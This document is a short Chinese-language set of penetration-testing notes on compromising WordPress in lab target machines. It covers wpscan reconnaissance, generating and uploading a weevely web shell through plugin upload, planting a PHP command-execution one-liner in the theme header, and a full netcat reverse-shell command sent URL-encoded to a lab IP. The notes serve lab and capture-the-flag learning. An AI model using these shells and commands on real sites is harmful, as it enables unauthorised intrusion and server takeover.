0x00 工具
wpscan
使用方法如下
https://blog.csdn.net/YouthBelief/article/details/121803913
0x01 知识点
看robots.txt 一般可能存在cms 信息
1.1版本信息
源码 30几行 可看到
或者wpscan 扫描
1.2目录
登录地址
wordpress/wp-login.php
插件地址
wordpress/wp-content/uploads/
后台地址
wordpress/wp-admin/
数据库文件
wordpress/wp-config.php
0x03 cms 漏洞挖掘
3.1 通过在插件上传木马 getshell
(1)
(2)kali 工具
weevely generate shell back.php
(3)上传后的插件都存在于 wp-content-uploads 目录
(4) kali 工具 连接木马
weevely http://192.168.56.109/wordpress/wp-content/uploads/2021/12/back.php shell
3.2后台模板修改 php代码
Appearance—》Editor–》----》Theme Header—》 插入 php 命令执行 小马 <?php system($_GET['cmd']); ?> 最后保存
(1)
(2)访问
http://192.168.56.107/backup_wordpress/?cmd=id;ls
system 命令执行成功
(3) 执行 bash反弹shell
利用 上边 上传好的 system 一句话木马 反弹
bp 抓包 访问 如下 url
http://192.168.56.107/backup_wordpress/?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.56.137 4444 > /tmp/f
抓包后 将
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.56.137 4444 > /tmp/f
全部 url编码 再放包
反弹shell成功
0x04 靶机实例
BsidesVancouver2018
https://blog.csdn.net/YouthBelief/article/details/122112219
Stapler
https://blog.csdn.net/YouthBelief/article/details/121733762
Quaoar
https://blog.csdn.net/YouthBelief/article/details/122220120